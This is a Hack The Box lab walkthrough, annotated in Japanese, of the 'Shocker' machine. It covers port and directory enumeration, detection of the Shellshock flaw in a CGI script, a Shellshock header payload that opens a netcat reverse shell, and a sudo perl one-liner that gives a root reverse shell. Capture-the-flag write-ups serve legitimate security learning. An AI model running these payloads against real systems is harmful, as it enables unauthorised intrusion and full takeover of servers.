Hack The Box shocker
shocker
tags: HTB Easy
Procedure
enumeration
- nmap scan
PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
GET / HTTP/1.1
Host: 10.10.10.56
HTTP/1.1 200 OK
Date: Sat, 20 Mar 2021 23:44:56 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Fri, 22 Sep 2017 20:01:19 GMT
ETag: "89-559ccac257884"
Accept-Ranges: bytes
Content-Length: 137
Vary: Accept-Encoding
Content-Type: text/html
<!DOCTYPE html>
<html>
<body>
<h2>Don't Bug Me!</h2>
<img src="bug.jpg" alt="bug" style="width:450px;height:350px;">
</body>
</html>
コンテンツは見つからなかった。
- 80/tcp nikto
/opt/nikto/program/nikto.pl -h 10.10.10.56 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.56 + Target Hostname: 10.10.10.56 + Target Port: 80 + Start Time: 2021-03-20 21:19:52 (GMT9) --------------------------------------------------------------------------- + Server: Apache/2.4.18 (Ubuntu) + The anti-clickjacking X-Frame-Options header is not present. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.46). Apache 2.2.34 is the EOL for the 2.x branch. + Server may leak inodes via ETags, header found with file /, inode: 89, size: 559ccac257884, mtime: gzip + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS + OSVDB-3233: /icons/README: Apache default file found. + 8862 requests: 0 error(s) and 6 item(s) reported on remote host + End Time: 2021-03-20 21:53:04 (GMT9) (1992 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
特に大きな情報はなし
dirb http://10.10.10.56 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sat Mar 20 21:15:08 2021 URL_BASE: http://10.10.10.56/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.56/ ---- + http://10.10.10.56/cgi-bin/ (CODE:403|SIZE:294) + http://10.10.10.56/index.html (CODE:200|SIZE:137) + http://10.10.10.56/server-status (CODE:403|SIZE:299) ----------------- END_TIME: Sat Mar 20 21:30:31 2021 DOWNLOADED: 4612 - FOUND: 3
/cgi-bin/ディレクトリを発見
$ python3 dirsearch.py -e "cgi,sh,py,txt,bin" -u http://10.10.10.56/cgi-bin/
_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )
Extensions: cgi, sh, py, txt, bin | HTTP method: GET | Threads: 30 | Wordlist size: 10944
Error Log: /home/ubu/Downloads/dirsearch/logs/errors-21-03-04_00-49-49.log
Target: http://10.10.10.56/cgi-bin/
Output File: /home/ubu/Downloads/dirsearch/reports/10.10.10.56/cgi-bin_21-03-04_00-49-51.txt
[00:49:51] Starting:
[00:50:06] 403 - 310B - /cgi-bin/.htaccess.sample
[00:50:06] 403 - 308B - /cgi-bin/.htaccess.orig
[00:50:06] 403 - 305B - /cgi-bin/.ht_wsr.txt
[00:50:06] 403 - 308B - /cgi-bin/.htaccess.bak1
[00:50:06] 403 - 307B - /cgi-bin/.htaccessOLD2
[00:50:06] 403 - 306B - /cgi-bin/.htaccessOLD
[00:50:06] 403 - 309B - /cgi-bin/.htaccess_extra
[00:50:06] 403 - 306B - /cgi-bin/.htaccessBAK
[00:50:06] 403 - 308B - /cgi-bin/.htpasswd_test
[00:50:06] 403 - 308B - /cgi-bin/.htaccess.save
[00:50:06] 403 - 308B - /cgi-bin/.htaccess_orig
[00:50:06] 403 - 298B - /cgi-bin/.htm
[00:50:06] 403 - 304B - /cgi-bin/.htpasswds
[00:50:06] 403 - 305B - /cgi-bin/.httr-oauth
[00:50:07] 403 - 299B - /cgi-bin/.html
[00:50:07] 403 - 306B - /cgi-bin/.htaccess_sc
[00:52:37] 200 - 118B - /cgi-bin/user.sh
user.shファイルを発見
GET /cgi-bin/user.sh HTTP/1.1
Host: 10.10.10.56
HTTP/1.1 200 OK
Date: Sat, 20 Mar 2021 23:55:58 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/x-sh
Content-Length: 118
Content-Type: text/plain
Just an uptime test script
19:55:58 up 11:41, 0 users, load average: 0.00, 0.00, 0.00
特に何もなさそう、、、
- 80/tcp 再びnikto
$ nikto /opt/nikto/program/nikto.pl -h 10.10.10.56/cgi-bin/user.sh
誤検知で色々出てくるが、shellshockの脆弱性を発見。
GET /cgi-bin/user.sh/ HTTP/1.1
Host: 10.10.10.56
Referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
User-Agent: () { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;
Connection: close
HTTP/1.1 200 OK
Date: Sat, 20 Mar 2021 12:35:53 GMT
Server: Apache/2.4.18 (Ubuntu)
93e4r0-CVE-2014-6278: true
Connection: close
Content-Type: text/x-sh
Content-Length: 150
93e4r0-CVE-2014-6271: true
Content-Type: text/plain
Just an uptime test script
08:35:53 up 21 min, 0 users, load average: 0.00, 0.01, 0.00
exploit
- shellshockの脆弱性を使ってリバースシェルを取得 自端末でリスナーを作成
$ nc -lnvp 4445
shellshockを利用したリクエスト送信
[OSCP](https://oscp.infosecsanyam.in/shells/linux-reverse-shell-one-liner)ありがとう
GET /cgi-bin/user.sh/ HTTP/1.1
Host: 10.10.10.56
User-Agent: () { :;}; echo; /bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.3 4445 >/tmp/f'
Connection: close
$ whoami shelly
privilege escalation
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
perlがパスワードなしでroot権限で実行できる
$ whoami
shelly
$ sudo perl -e 'use Socket;$i="10.10.15.3";$p=4446;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# whoami root
Closing
- 便利なツールに感謝
